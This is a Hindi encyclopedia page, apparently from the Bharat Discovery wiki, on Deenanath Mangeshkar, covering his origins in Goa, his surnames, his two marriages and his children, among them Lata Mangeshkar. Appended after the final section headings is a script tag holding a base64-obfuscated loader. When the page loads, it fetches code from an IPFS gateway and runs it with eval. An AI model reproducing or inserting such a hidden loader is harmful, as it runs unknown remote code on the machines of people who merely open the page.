दीनानाथ मंगेशकर

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 08:30, 26 फ़रवरी 2022 का अवतरण (''''दीनानाथ मंगेशकर''' (अंग्रेज़ी: ''Deenanath Mangeshkar'', जन्म- 29 द...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

दीनानाथ मंगेशकर (अंग्रेज़ी: Deenanath Mangeshkar, जन्म- 29 दिसम्बर, 1900; मृत्यु- 24 अप्रॅल, 1942) मराठी रंगमंच के प्रसिद्ध अभिनेता, गायक, शास्त्रीय संगीतज्ञ तथा नाट्य संगीतकार थे। वह गायिका लता मंगेशकर, आशा भोंसले ,मीणा खड़ीकर ,उषा मंगेशकर और संगीतकार हृदयनाथ मंगेशकर के पिता थे। 'मास्टर दीनानाथ मंगेशकर पुरस्कार' 24 अप्रैल को यानी मास्टर दीनानाथ के स्मृति दिवस पर आयोजित किए जाने की परंपरा रही है। कोरोना महामारी के समय इस पुरस्कार समारोह को दो सालों से स्थगित किया जा रहा है। बहुत कम लोग जानते हैं कि अपनी सुरीली आवाज से बॉलीवुड को कई सुपरहिट गाने देने वालीं लता मंगेशकर को गायिका की प्रेरणा उनके पिता दीनानाथ मंगेशकर से ही उन्हें मिली थी।

परिचय

दीनानाथ मंगेशकर का जन्म 29 दिसम्बर, 1900 को गोवा में मंगेशी गांव में हुआ था। वह 'दीना' के नाम से लोकप्रिय थे। उनके पिता गणेश भट्ट नवाथे एक कर्हाडे ब्राह्मण थे तथा प्रसिद्ध मंगेशी मंदिर, गोवा में पुजारी थे। इनके परिवार का मूल उपनाम हार्डिकर था, चूँकि इनके परिवार को मंगेशी मंदिर के शिवलिंग के लिए अभिषेक का पारंपरिक सौभाग्य प्राप्त हुआ था; अतः उन्हें 'अभिषेकी' उपनाम से भी जाना जाने लगा था। हालांकि, दीनानाथ मंगेशकर ने अपने पिता के परिवार के दोनों उपनामों को नहीं अपनाया। इसका कारण यह था कि उनकी माँ येसुबाई राणे गोवा के देवदासी समुदाय से थीं, जो अब गोमांतक मराठा समाज के रूप में जाना जाता है। चूंकि वे परिवार सहित गोवा के मंगेशी गांव में रहते थे और दीनानाथ वहाँ पैदा हुए थे, अतः उन्होंने अपना उपनाम 'मंगेशकर', जिसका अर्थ था 'मंगेश द्वारा' अपनाया।

विवाह

लता मंगेशकर के पिता दीनानाथ मंगेशकर ने गुजराती बहनों से शादी की थी। दीनानाथ मूल रूप से मराठी थे ओर उनकी पहली शादी साल 1922 में गुजरात के थलनेर गांव (तापी नदी किनारे स्थित) की रहने वाली नर्मदाबेन से हुई थी। नर्मदाबेन के पिता हरिदास उस समय गुजरात के प्रसिद्ध जमींदारों में से एक थे और उन्हें नगरसेठ के नाम से जाना जाता था। खास बात यह है कि उस वक्त में एक मराठी और एक गुजराती परिवार में शादी होना बहुत बड़ी बात थी।

शादी के चार साल बाद बीमारी के चलते नर्मदाबेन की मौत हो गई थी। इनकी कोई संतान नहीं थी। इसके बाद दीनानाथ मंगेशकर ने 1927 में नर्मदाबेन की छोटी बहन सेवंतीबेन से शादी कर ली। शादी के बाद सेवंतीबेन का नाम बदलकर सुधामती हो गया। दीनानाथ और सुधामती की पांच संतानों में चार बेटियां- लता, मीना, आशा, ऊषा और एक बेटा हृदयनाथ हैं। लता जब 13 साल की थीं, तब उनके पिता दीनानाथ मंगेशकर का हृदयाघात से निधन हो गया।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>